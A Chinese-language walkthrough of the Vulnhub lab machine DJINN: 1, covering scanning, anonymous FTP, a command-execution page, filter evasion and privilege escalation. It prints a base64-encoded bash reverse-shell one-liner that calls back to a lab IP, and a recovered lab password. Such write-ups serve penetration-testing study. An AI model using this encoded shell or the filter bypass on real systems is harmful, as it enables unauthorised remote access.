1. 程式人生 > 實用技巧 >Vulnhub-靶機-DJINN: 1

Vulnhub-靶機-DJINN: 1

本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關

靶機下載之後使用僅主機模式載入到本地VMware Workstation工作站,需要發現目標靶機的IP地址,可以使用nmap,netdiscover,或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 當然也是可以使用Windows環境下mac地址掃描工具都是可以的,那麼本次演示就是arp-scan工具發現

地址:https://www.vulnhub.com/entry/djinn-1,397/

nmap掃描結果如下:

開放了3個埠,21,1337,7331,根據掃描結果知道目標ftp可以使用匿名登入,我們先看看

使用lftp命令登入上去,通過mget批量下載目標檔案到本地,檢視到如下結果:

上面得到的結果暫時還沒發現有什麼好利用的,就先放著,我們看看掃描出來的埠7331,通過nc連線此埠, 返回有類似html的頁面,就使用瀏覽器訪問看看

得到如上頁面,那麼我們先不管,直接下載https://github.com/OJ/gobuster/releases使用gobuster進行目標猜解看看

訪問wish目錄發現存在執行命令的視窗,但是發現過濾了一些反彈shell的命令引數,嘗試使用base64編碼的形式進行反彈,具體如下

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMS84ODMzIDA+JjE= | base64 -d | bash

成功反彈shell

我這裡執行iidd是終端顯示問題,實際操作沒啥問題,在反彈的shell中檢視當前py檔案,發現如下重要資訊

nitish:p4ssw0rdStr3r0n9

使用su切換到賬戶nitish ,切換使用者成功之後做了如下操作:

通過查詢man手冊發現一個帶執行命令的引數-cmd ,試了幾下,確認是隨便寫字元就可以跳轉到另一個使用者

得到如上資訊,離root許可權就不遠了,執行下sudo指定的檔案

切換到sam的家目錄下,發現隱藏檔案

通過nc下載到本地將pyc還原成py程式碼,確認python程式碼存在漏洞,具體詳情可以看看https://www.geeksforgeeks.org/vulnerability-input-function-python-2-x/